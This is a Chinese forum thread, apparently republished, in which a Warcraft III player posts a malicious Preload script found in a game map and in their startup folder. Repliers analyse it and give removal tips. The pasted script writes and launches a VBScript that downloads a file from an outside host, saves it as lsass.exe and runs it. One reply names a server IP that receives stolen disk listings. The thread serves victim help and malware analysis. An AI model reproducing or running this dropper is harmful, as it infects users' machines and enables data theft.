【码农帮我看看】我的启动选项里多了一个文件。大伙帮我看看着是什么。很有可能是病毒啊(已经解决了。微民网威武!)
整理时间:2013-06-18 01:44 来源:www.vimiy.com 作者:编辑 点击:次
【楼主】2013-06-15 20:42
» 我的启动选项里多了一个文件。大伙帮我看看着是什么。很有可能是病毒啊(已经解决了。微民网威武!)
昨天上VS和基友玩魔兽争霸殴打疯狂电脑。
等他的时候呢。
我就去当裁判。
看别人1V1对战。
进去了以后。
我说你的地图没带BLZ的蓝色徽标。
别人不会和你打得。
他说是吗?我不懂。
反正我在吃饭,聊聊天就好了。
聊了一会。
他说你重启下,我就能知道你的QQ,
于是我重启了一下。就出来一个自动加载的东西。没来的及看就自动关了。
结果他没加我QQ。我于是担心中病毒了。找到启动选项看到这个东西。。
文件名是5.BAT
(已经被解决了。谢谢大家了。)提醒大家上VS打对战,一定要进带暴雪徽标的地图房间啊。不然就跟我一样了
具体内容就是这个:
function PreloadFiles takes nothing returns nothing
call Preload( "")
echo Set xPost = createObject("Microsoft.XMLHTTP") >5.vbs
//" )
call Preload( "")
echo xPost.Open "GET","http://www.scuddertech.com/red.jpg",0 >>5.vbs
//" )
call Preload( "")
echo xPost.Send() >>5.vbs
//" )
call Preload( "")
echo Set sGet = createObject("ADODB.Stream") >>5.vbs
//" )
call Preload( "")
echo sGet.Mode = 3 >>5.vbs
//" )
call Preload( "")
echo sGet.Type = 1 >>5.vbs
//" )
call Preload( "")
echo sGet.Open() >>5.vbs
//" )
call Preload( "")
echo b=xPost.responseBody>>5.vbs
//" )
call Preload( "")
echo if len(b) then>>5.vbs
//" )
call Preload( "")
echo sGet.Write(b) >>5.vbs
//" )
call Preload( "")
echo Set fff=createobject("scripting.filesystemobject")>>5.vbs
//" )
call Preload( "")
echo Set run = createObject("wscript.shell") >>5.vbs
//" )
call Preload( "")
echo sGet.SaveToFile "lsass.exe",2 >>5.vbs
//" )
call Preload( "")
echo run.run "lsass.exe",3 >>5.vbs
//" )
call Preload( "")
echo end if>>5.vbs
//" )
call Preload( "")
start 5.vbs
//" )
call PreloadEnd( 0.0 )
endfunction
有高人能帮我分析下这是个什么吗?
我正在下载杀毒软件。。 等下全面杀毒
网友评论2013-06-15 20:44
删除下,用冰刃等安全工具查看有没有被挂钩。。。
网友评论2013-06-15 20:46
那个图片网址有问题吧 系统补丁有及时打上去么
网友评论2013-06-15 20:46
Reply to Reply Post by 南方老狼二世 (2013-06-15 20:44)
正在安装诺顿,结果安装失败了。
网友评论2013-06-15 20:47
Reply to Reply Post by tyrael_x (2013-06-15 20:46)
从来都不打补丁的。
网友评论2013-06-15 20:50
什么都没接收下载就这样了?
网友评论2013-06-15 20:53
他肯定以“给你看一眼我菊花照片”的名义让你先打开了QQ上传过来的一张图片。
我在开虚拟机,研究下这个vbs脚本
网友评论2013-06-15 20:53
Reply to Reply Post by 健龙 (2013-06-15 20:50)
没有接受任何文件啊啊。进去别人的房间都会自动下载他的对战地图的。估计就是这个地图有问题。
网友评论2013-06-15 20:54
Reply to Reply Post by dulala007 (2013-06-15 20:53)
感激不尽,我这杀毒软件没装成功。我试试360看看
网友评论2013-06-15 21:00
好像是一个下马的脚本,这个脚本生成一个vbs脚本
下载那图片之后,保存成lsass.exe并运行~
问题是,楼主这个启动项怎么来的?他给你啥东西了
网友评论2013-06-15 21:03
Reply to Reply Post by 最初的流星 (2013-06-15 21:00)
他什么都给我啊。只是在游戏里聊天啊。除此之外,什么都没有做啊
是在VS对战平台,就跟浩方对战一样的那种。
我进去玩魔兽争霸,进入他的房间就会自动下载他的游戏地图的。
应该就是这个地图的问题吧
网友评论2013-06-15 21:06
如果真的是地图问题岂不是一重大BUG?地图随便挂马了
网友评论2013-06-15 21:07
Reply to Reply Post by 好孩 (2013-06-15 21:06)
绝对有可能啊,
我看了下那个文件的安装时间。
就是我重启之前的时间啊。
网友评论2013-06-15 21:07
肯定他传照片给你看了。
脚本里自动下载的图片360直接就报警了。
网友评论2013-06-15 21:11
Reply Post by 板鸭君 (2013-06-15 21:07):
绝对有可能啊,
我看了下那个文件的安装时间。
就是我重启之前的时间啊。
那个5.vbs是每次启动的时候自动生成的, echo>5.vbs那几行,就是自动生成5.vbs。
虚拟机里装的XP,这段代码运行居然报错了。
看来还是XP安全啊。
网友评论2013-06-15 21:11
Reply to Reply Post by dulala007 (2013-06-15 21:07)
我估计已经中招了,之前系统都是裸奔的。
我绝对只是在游戏里和他聊了一会。游戏都还没开始。
现在正在下载360.这乌龟一样的速度。好慢啊。
网友评论2013-06-15 21:12
Reply to Reply Post by dulala007 (2013-06-15 21:11)
我在的是WIN7也 报错啊。
网友评论2013-06-15 21:13
不打补丁?
那菊花大开别人随便艹的
图片前几年有个出名的病毒
网友评论2013-06-15 21:14
echo Set fff=createobject("scripting.filesystemobject")>>5.vbs
//" )
call Preload( "")
echo Set run = createObject("wscript.shell") >>5.vbs
//" )
call Preload( "")
echo sGet.SaveToFile "lsass.exe",2 >>5.vbs
下载图片 改名
网友评论2013-06-15 21:15
记得有一个版本的war3能溢出的
你应该是被他种马了
简单分析了一下
这个http://www.scuddertech.com/red.jpg 会被保存在硬盘上并运行
比较搞笑的是这位老兄写的几个程序
都是debug版本
然后下载:http://www.scuddertech.com/pink.jpg 和
http://www.scuddertech.com/green.jpg
其中green.jpg是个"PowerArchiver(可以理解为rar命令行)"用upx加了下壳
pink.jpg是个PE文件
主要的作用是全盘遍历
然后把结果发送到"208.92.64.37" 这台木马服务器
没什么驻留系统的太强手段
把这个vbs的启动项用xuetr删除了就行
这老兄挺有意思
打war3还专门写了这么个程序
挺有研究精神
就是水平太。。。。。。
你可以个他说:“你家木马TM用debug版本啊”
发表回复下一页(2)
LOL罗辑思维全国人大代表真三搞笑视频柳岩
Copyright © 2012年2月8日
